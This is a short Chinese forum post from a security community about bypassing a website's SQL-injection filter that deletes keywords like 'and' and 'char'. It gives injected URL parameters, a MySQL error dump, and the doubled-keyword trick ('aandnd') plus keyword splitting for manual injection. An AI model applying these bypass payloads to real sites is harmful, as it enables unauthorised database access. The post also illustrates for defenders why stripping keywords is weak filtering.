文章作者:sobiny
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
我所说的过滤关键字,并不是指检测到and,char字符后就报出错误,停止执行命令,返回上一页等等
而是指某些网站直接把and和char字符删除来防止SQL的注入
我不敢说网上是我第一次遇到这个情况,也不敢保证别人没写过这类似的文章
不过目前好象没看到这类型的文章,今天也刚好遇到了这个问题
就把我的体验给大家说说,斗胆标上“原创”
今天遇到一个网站
直接输入一个 '; ,正常
http://www.eviloctal.com/shop/show.php?id=118%20and%201=1
这个字符输入进去以后,得到如下提示:
select * from webproduct where ProductID=118 1=1 and iStatus=1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';1=1 and iStatus=1'; at line 1
我看了看这段出错的代码~
http://www.eviloctal.com/select * from webproduct where ProductID=118 1=1
这一句,明显少了一个AND
我就在想能不能饶过它,试了好几种方法都不行
最后,我就在想,是不是它直接把我的and删除了呢?
然后试着加上了 http://www.eviloctal.com/shop/show.php?id=118%20aandnd%201=1
结果页面正常
http://www.eviloctal.com/shop/show.php?id=118%20aandnd%201=2
无此产品
因为aandnd这个删除了一个and 后,他留下了一个and来
如果这样的话,就留下了一个and
后来发现他们还过滤了';,char,;等等
后来构造语句,就可以直接是a';nd或者 ch;ar这种格式来直接手工注入~~
为保证被测试者的利益,他们的网站地址已经全部换为http://www.eviloctal.com/了,大家不要用这个地址来测试邪恶八进制了,没用的,呵呵
本文没有什么技术含量,高手飘过~~作者: feyfey730 时间: 2006-4-14 09:29 标题: [讨论]关于SQL注入过滤关键字的渗透
